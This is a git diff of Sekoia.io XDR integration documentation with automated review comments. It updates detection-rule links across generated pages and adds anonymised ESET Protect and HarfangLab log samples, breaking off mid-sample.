+++ b/_shared_content/operations_center/integrations/generated/2886cd2d-f686-4e7d-9976-250cba2eaf5b.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event.json" diff --git a/_shared_content/operations_center/integrations/generated/2b13307b-7439-4973-900a-2b58303cac90.md b/_shared_content/operations_center/integrations/generated/2b13307b-7439-4973-900a-2b58303cac90.md index 6488cf0104..7051890eb7 100644 --- a/_shared_content/operations_center/integrations/generated/2b13307b-7439-4973-900a-2b58303cac90.md +++ b/_shared_content/operations_center/integrations/generated/2b13307b-7439-4973-900a-2b58303cac90.md 
@@ -31,7 +31,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "AUTH_CONNECTION_disconnected.json" diff --git a/_shared_content/operations_center/integrations/generated/2e9d87ed-6606-445a-90d1-9c7695b28335.md b/_shared_content/operations_center/integrations/generated/2e9d87ed-6606-445a-90d1-9c7695b28335.md index bdac34a35c..0348bae27d 100644 --- a/_shared_content/operations_center/integrations/generated/2e9d87ed-6606-445a-90d1-9c7695b28335.md +++ b/_shared_content/operations_center/integrations/generated/2e9d87ed-6606-445a-90d1-9c7695b28335.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_bounced.json" diff --git a/_shared_content/operations_center/integrations/generated/2ee6048e-8322-4575-8e47-1574946412b6.md b/_shared_content/operations_center/integrations/generated/2ee6048e-8322-4575-8e47-1574946412b6.md index 3bf28c6eab..de3d50124e 100644 --- a/_shared_content/operations_center/integrations/generated/2ee6048e-8322-4575-8e47-1574946412b6.md +++ b/_shared_content/operations_center/integrations/generated/2ee6048e-8322-4575-8e47-1574946412b6.md 
@@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_attachments_details.json" diff --git a/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a.md b/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a.md index 88954c8f17..7a7a85e8e0 100644 --- a/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a.md +++ b/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. 
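Review bot: In the `@@ -269,7 +275,7 @@` hunk the process mapping is inverted. The 4648 event's own `ProcessId` (`"0x15bc"`, decimal 5564, `OktaAgentService.exe`) ends up in `process.parent.pid`, while `process.pid` 740 and `process.thread.id` 1408 are the record-level `Pid`/`Tid` of the process that wrote the event, not the process that presented the explicit credentials; `process.name` and `process.executable` are also never filled from `ProcessName`. Consider mapping `0x15bc` to `process.pid`, the `ProcessName` path to `process.executable`, and leaving the writer's `Pid`/`Tid` under `azure_windows`. The account whose credentials were used (`TargetUserName` `JDO`) appears only under `azure_windows.event_data`; adding it to `user.target.name` and `related.user` would let rules on explicit-credential logons pivot on both accounts. Types are mixed as well: `action.properties[].opcode` is the integer `0` while `azure_windows.opcode` is the string `"0"`. Finally, the removed `message` value spliced CrowdStrike threatgraph JSON onto the 4648 `RawXml` (`...#cf4648001254400x8020...`), which is what produced the old `No fields extracted from original event` warning; worth checking that no other generated sample carries the same fused payload.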
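Review bot: In the `@@ -33,41 +33,30 @@` hunk the new `RawXml` value contains no XML markup at all: element values are run together (`4648001254400x8020000000000000185982314Securitydd.example.org...`), so the tags were evidently stripped when the fixture was captured and any RawXml parsing stage validated against this sample will not see the structure the real field carries. Either restore a minimal escaped XML document or label the fixture as tag-stripped so nobody derives a parser from it. The anonymisation is also inconsistent inside the same sample: `Description` shows `Logon ID:\t\t0x111111` while `RawXml` (and the transformed `SubjectLogonId`) show `0x23b659`; pick one value. Renaming the tab from `invalid_message` to `event_4648` is right, since the replaced Azure Storage `GetBlob` sample belonged to a different category, and dropping the `tokenHash`/`SasSignature` values from the docs is a welcome side effect.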
@@ -26,10 +26,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_alert_1.json" @@ -1010,7 +1009,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -1054,3 +1053,6 @@ The following table lists the fields that are extracted, normalized under the EC |`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.name` | `keyword` | Short name or login of the user. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Eset/eset_protect). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a_sample.md b/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a_sample.md new file mode 100644 index 0000000000..2eed679fd5 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/2ffff1fd-fed7-4a24-927a-d619f2bb584a_sample.md 
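Review bot: The unchanged context line in `@@ -1010,7 +1009,7 @@` reads `It should be noted that infered fields are not listed.`; since this hunk already touches the Extracted Fields heading in the generator output, fix the spelling to `inferred` in the template while you are here.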
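Review bot: The `@@ -1054,3 +1053,6 @@` hunk appends two blank lines before the `For more information on the Intake Format...` link and leaves the file without a terminating newline (`\ No newline at end of file`). A single blank line plus a trailing newline would keep the generated pages uniform and avoid spurious diffs on the next regeneration; the link itself to `intake-formats/tree/main/Eset/eset_protect` is a useful addition.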
@@ -0,0 +1,471 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_alert_1" + + + ```json + { + "event_type": "ESET Inspect Alert", + "ipv4": "3.4.5.6", + "hostname": "desktop01.example.com", + "os_name": "Microsoft Windows Server 2012 R2 Standard", + "group_name": "Example/Domain Controllers", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "20-May-2024 09:08:10", + "severity": "Warning", + "processname": "%SYSTEM%\\nslookup.exe", + "username": "nt authority\\system", + "rulename": "Nslookup wrote a file [F0500]", + "count": 1, + "hash": "ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC", + "eialarmid": "1234", + "eiconsolelink": "https://dark.example.org:443/console/detection/1234", + "computer_severity_score": "60", + "severity_score": "46" + } + ``` + + + +=== "test_alert_2" + + + ```json + { + "event_type": "ESET Inspect Alert", + "ipv4": "3.4.5.6", + "hostname": "desktop01.example.com", + "os_name": "Microsoft Windows Server 2012 R2 Standard", + "group_name": "Example/Domain Controllers", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "20-May-2024 09:08:10", + "severity": "Warning", + "processname": "%SYSTEM%\\nslookup.exe", + "username": "nt authority\\system", + "rule_name": "Nslookup wrote a file [F0500]", + "count": 1, + "hash": "ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC", + "eialarmid": "1234", + "eiconsolelink": "https://dark.example.org:443/console/detection/1234", + "computer_severity_score": "60", + "severity_score": "46" + } + ``` + + + +=== "test_audit_event_1" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + 
"occured": "20-May-2024 09:05:05", + "severity": "Information", + "domain": "Update modules", + "action": "Update", + "detail": "Modules successfully updated.", + "user": "jdoe", + "result": "Success" + } + ``` + + + +=== "test_audit_event_2" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "20-May-2024 09:14:03", + "severity": "Information", + "domain": "Native user", + "action": "Logout", + "target": "Administrator", + "detail": "Logging out native user 'Administrator'.", + "user": "Administrator", + "result": "Success" + } + ``` + + + +=== "test_audit_event_3" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:59:26", + "severity": "Information", + "domain": "ESET INSPECT", + "action": "Marked as Resolved", + "target": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "detail": "Resolved via ESET INSPECT", + "user": "Administrator", + "result": "Success" + } + ``` + + + +=== "test_audit_event_4" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "os_name": "Microsoft Windows Server 2019 Datacenter Evaluation", + "group_name": "EXAMPLE/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:58:28", + "severity": "Information", + "domain": "ESET INSPECT", + "action": "Detections", + "target": "00000000-0000-0000-7002-000000000002", + "detail": "Detection \"Rule; Suspicious Service Executed [B0902]\" resolved", + "user": "Administrator", + "result": "Success" + } + ``` + + + +=== "test_audit_event_5" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:55:05", + "severity": "Information", + "domain": "Single-sign-on 
token", + "action": "Single sign on token issue", + "detail": "Single Sign On Session Token '********' issued for native user 'Administrator'.", + "user": "", + "result": "Success" + } + ``` + + + +=== "test_audit_event_6" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:55:05", + "severity": "Information", + "domain": "Single-sign-on token", + "action": "Single sign on token issue", + "cause": "Single Sign On Session Token '********' issued for native user 'Administrator'.", + "user": "", + "result": "Success" + } + ``` + + + +=== "test_audit_event_7" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:55:05", + "severity": "Information", + "domain": "Single-sign-on token", + "action": "Single sign on token issue", + "cause": "Single Sign On Session Token '********' issued for native user 'Administrator'.", + "user": "", + "result": "Failure" + } + ``` + + + +=== "test_audit_event_8" + + + ```json + { + "event_type": "Audit_Event", + "ipv4": "3.4.5.6", + "hostname": "auvergnat", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "10-May-2024 10:55:05", + "severity": "Information", + "domain": "Single-sign-on token", + "action": "Single sign on token issue", + "cause": "Single Sign On Session Token '********' issued for native user 'Administrator'.", + "user": "john.doe@example.com", + "result": "Failure" + } + ``` + + + +=== "test_firewall_1" + + + ```json + { + "event_type": "FirewallAggregated_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "EXAMPLE/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "07-May-2024 07:42:01", + "severity": "Fatal", + "event": "Suspected botnet 
detected", + "source_address": "1.2.3.4", + "source_address_type": "IPv4", + "source_port": 22089, + "target_address": "5.6.7.8", + "target_address_type": "IPv4", + "target_port": 57178, + "protocol": "TCP", + "action": "Blocked", + "handled": true, + "process_name": "C:\\Windows\\Temp\\tmpseajke.exe", + "inbound": true, + "threat_name": "Win32/RiskWare.Meterpreter.A", + "aggregate_count": 1 + } + ``` + + + +=== "test_firewall_2" + + + ```json + { + "event_type": "FirewallAggregated_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "EXAMPLE/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "07-May-2024 07:42:01", + "severity": "Fatal", + "event": "Suspected botnet detected", + "source_address": "1.2.3.4", + "source_address_type": "IPv4", + "source_port": 22089, + "target_address": "5.6.7.8", + "target_address_type": "IPv4", + "target_port": 57178, + "protocol": "TCP", + "action": "Blocked", + "handled": true, + "processname": "C:\\Windows\\Temp\\tmpseajke.exe", + "inbound": true, + "threat_name": "Win32/RiskWare.Meterpreter.A", + "aggregate_count": 1 + } + ``` + + + +=== "test_firewall_3" + + + ```json + { + "event_type": "FirewallAggregated_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "EXAMPLE/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "07-May-2024 07:42:01", + "severity": "Fatal", + "event": "Suspected botnet detected", + "source_address": "1.2.3.4", + "source_address_type": "IPv4", + "source_port": 22089, + "target_address": "5.6.7.8", + "target_address_type": "IPv4", + "target_port": 57178, + "protocol": "TCP", + "action": "Blocked", + "handled": true, + "processname": "C:\\Windows\\Temp\\tmpseajke.exe", + "inbound": true, + "threat_name": "Win32/RiskWare.Meterpreter.A", + "aggregate_count": 1 + } + ``` + + + +=== "test_firewall_4" + + + ```json + { 
+ "event_type": "FirewallAggregated_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "EXAMPLE/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "07-May-2024 07:42:01", + "severity": "Fatal", + "event": "Suspected botnet detected", + "destination_address": "1.2.3.4", + "source_address_type": "IPv4", + "destination_port": 22089, + "target_address": "5.6.7.8", + "target_address_type": "IPv4", + "target_port": 57178, + "protocol": "TCP", + "action": "Blocked", + "handled": true, + "process_name": "C:\\Windows\\Temp\\tmpseajke.exe", + "inbound": true, + "threat_name": "Win32/RiskWare.Meterpreter.A", + "aggregate_count": 1 + } + ``` + + + +=== "test_hips_1" + + + ```json + { + "event_type": "HipsAggregated_Event", + "ipv4": "192.168.30.181", + "hostname": "test-w10-uefi", + "group_name": "Lost & found", + "source_uuid": "5dbe31ae-4ca7-4e8c-972f-15c197d12474", + "occured": "21-Jun-2021 11:53:21", + "severity": "Critical", + "application": "C:\\Users\\Administrator\\Desktop\\es_pack_to_test\\test\\java.exe", + "operation": "Attempt to run a suspicious object", + "target": "C:\\Users\\Administrator\\Desktop\\es_pack_to_test\\test\\trojan.exe", + "action": "blocked", + "handled": true, + "rule_id": "Suspicious attempt to launch an application", + "aggregate_count": 2 + } + ``` + + + +=== "test_hips_2" + + + ```json + { + "event_type": "HipsAggregated_Event", + "ipv4": "192.168.30.181", + "hostname": "test-w10-uefi", + "group_name": "Lost & found", + "source_uuid": "5dbe31ae-4ca7-4e8c-972f-15c197d12474", + "occured": "21-Jun-2021 11:53:21", + "severity": "Critical", + "application": "C:\\Users\\Administrator\\Desktop\\es_pack_to_test\\test\\java.exe", + "operation": "Attempt to run a suspicious object", + "target": "C:\\Users\\Administrator\\Desktop\\es_pack_to_test\\test\\trojan.exe", + "action": "blocked", + "handled": true, + "rule_id": "Suspicious attempt to launch an 
application", + "aggregate_count": 2 + } + ``` + + + +=== "test_threat_1" + + + ```json + { + "event_type": "Threat_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "Example/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "07-May-2024 08:21:10", + "severity": "Warning", + "threat_type": "Trojan", + "threat_name": "Win32/ShellcodeRunner.B", + "threat_flags": "Variant", + "scanner_id": "Idle scanner", + "scan_id": "ndl3714149360.dat", + "engine_version": "29184 (20240507)", + "object_type": "File", + "object_uri": "file:///C:/Windows/Temp/tmpsesusx.exe", + "action_taken": "Cleaned by deleting", + "threat_handled": true, + "need_restart": false, + "username": "EXAMPLE NT\\SYSTEM", + "firstseen": "07-May-2024 07:44:39", + "hash": "ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC" + } + ``` + + + +=== "test_threat_2" + + + ```json + { + "event_type": "Threat_Event", + "ipv4": "3.4.5.6", + "hostname": "server01.example.org", + "os_name": "Microsoft Windows 10 Pro", + "group_name": "Example/Outer", + "source_uuid": "7c94f9e1-5a7f-4f69-8f33-8e8316798b0b", + "occured": "06-May-2024 14:39:17", + "severity": "Warning", + "threat_type": "Trojan", + "threat_name": "Win32/ShellcodeRunner.B", + "threat_flags": "Variant", + "scanner_id": "On-demand scanner", + "scan_id": "ndl1556677733.dat", + "engine_version": "29180 (20240506)", + "object_type": "Operating memory", + "object_uri": "file:///", + "action_taken": "Contained infected files", + "threat_handled": true, + "need_restart": false, + "username": "Example\\jdoe" + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/325369ba-8515-45b4-b750-5db882ea1266.md b/_shared_content/operations_center/integrations/generated/325369ba-8515-45b4-b750-5db882ea1266.md index 5bd8719c34..f0bfeb2b95 100644 --- a/_shared_content/operations_center/integrations/generated/325369ba-8515-45b4-b750-5db882ea1266.md 
+++ b/_shared_content/operations_center/integrations/generated/325369ba-8515-45b4-b750-5db882ea1266.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "denied_connection.json" diff --git a/_shared_content/operations_center/integrations/generated/331fa58d-8cf9-454a-a87f-48a3dc07d4d3.md b/_shared_content/operations_center/integrations/generated/331fa58d-8cf9-454a-a87f-48a3dc07d4d3.md index 91d96dee36..0f5dbe160f 100644 --- a/_shared_content/operations_center/integrations/generated/331fa58d-8cf9-454a-a87f-48a3dc07d4d3.md +++ b/_shared_content/operations_center/integrations/generated/331fa58d-8cf9-454a-a87f-48a3dc07d4d3.md 
@@ -30,7 +30,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "alert.json" diff --git a/_shared_content/operations_center/integrations/generated/340e3bc7-2b76-48e4-9833-e971451b2979.md b/_shared_content/operations_center/integrations/generated/340e3bc7-2b76-48e4-9833-e971451b2979.md index ba3d3a9f75..5719781c07 100644 --- a/_shared_content/operations_center/integrations/generated/340e3bc7-2b76-48e4-9833-e971451b2979.md +++ b/_shared_content/operations_center/integrations/generated/340e3bc7-2b76-48e4-9833-e971451b2979.md 
@@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "continue.json" diff --git a/_shared_content/operations_center/integrations/generated/35855de3-0728-4a83-ae19-e38e167432a1.md b/_shared_content/operations_center/integrations/generated/35855de3-0728-4a83-ae19-e38e167432a1.md index 75d7f3651a..66e68bf6e7 100644 --- a/_shared_content/operations_center/integrations/generated/35855de3-0728-4a83-ae19-e38e167432a1.md +++ b/_shared_content/operations_center/integrations/generated/35855de3-0728-4a83-ae19-e38e167432a1.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_accept.json" diff --git a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md index aef85030c0..7bf09eb7b5 100644 --- a/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md +++ b/_shared_content/operations_center/integrations/generated/3c7057d3-4689-4fae-8033-6f1f887a70f2.md 
@@ -39,7 +39,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "agentlog.json" 
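Review bot: two pairs of samples in the new ESET raw-events file are byte-for-byte duplicates and add no parser coverage: `test_firewall_2` and `test_firewall_3` are identical, and so are `test_hips_1` and `test_hips_2`; either drop one of each pair or restore the key variation that was presumably intended. The other pairs do vary a key spelling (`rulename` vs `rule_name` in the two alerts, `detail` vs `cause` in the audit events, `process_name` vs `processname` and `source_address`/`source_port` vs `destination_address`/`destination_port` in the firewall events), so a short note above each variant stating which spelling it exercises would make the intent reviewable. Please also confirm that `occured` is the vendor's own field name rather than a typo introduced in the fixtures, since the parser will be keyed on it.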
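Review bot: the `/docs/xdr/...` to `/xdr/...` link rewrite in the "Transformed Events Samples after Ingestion" paragraph is repeated identically across every integration file in this patch; since these files live under `integrations/generated/`, the same change needs to land in the generator template, otherwise the next regeneration reverts it, and the old `/docs/xdr/...` paths should keep working via redirects for anything that still links to them.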
@@ -1147,6 +1147,61 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "powershell.json" + + ```json + + { + "message": "{\"groups\": [{\"id\": \"14989c86-9f2f-4d8d-92b5-1210034ca640\", \"name\": \"SERVERS\"}], \"script_block\": \"$srv=Get-Service 'CARLTC85-CS02' -ErrorAction SilentlyContinue;\\t\\t\\t\\t\\tif ($srv) { Write-Output $srv.status; exit 0 } else { exit 1 }\", \"process_image_path\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\", \"sha256\": \"cebeed9684d8b8cbd821db554e5bb4937ffa1d32f2ef57481866c5f0b09838b0\", \"@event_create_date\": \"2024-08-02T09:03:13.833000Z\", \"@version\": \"1\", \"log_type\": \"powershell\", \"@timestamp\": \"2024-08-02T08:56:47.681487513Z\", \"pid\": 26748, \"tenant\": \"e13f90f553ce3a9e\", \"script_path\": \"\", \"agent\": {\"osproducttype\": \"Windows Server 2016 Datacenter\", \"version\": \"3.8.16\", \"additional_info\": {}, \"ostype\": \"windows\", \"osversion\": \"10.0.14393\", \"hostname\": \"srv-gmao-prod\", \"distroid\": null, \"dnsdomainname\": \"cmnshipyard.local\", \"agentid\": \"9f298e79-f284-4276-9176-83a02c40c8f0\", \"domain\": null, \"domainname\": \"CMNSHIPYARD\"}, \"incomplete\": false, \"process_unique_id\": \"de5434d5-f284-4276-7c68-00312b6f2996\"}", + "event": { + "dataset": "powershell" + }, + "@timestamp": "2024-08-02T09:03:13.833000Z", + "action": { + "properties": { + "ScriptBlockText": "$srv=Get-Service 'CARLTC85-CS02' -ErrorAction SilentlyContinue;\t\t\t\t\tif ($srv) { Write-Output $srv.status; exit 0 } else { exit 1 }" + } + }, + "agent": { + "id": "9f298e79-f284-4276-9176-83a02c40c8f0", + "name": "harfanglab" + }, + "harfanglab": { + "groups": [ + "{\"id\": \"14989c86-9f2f-4d8d-92b5-1210034ca640\", \"name\": \"SERVERS\"}" + ] + }, + "host": { + "domain": "CMNSHIPYARD", + "hostname": "srv-gmao-prod", + "name": "srv-gmao-prod", + "os": { + "full": "Windows Server 2016 Datacenter", + "version": "10.0.14393" + } + }, + "log": { + 
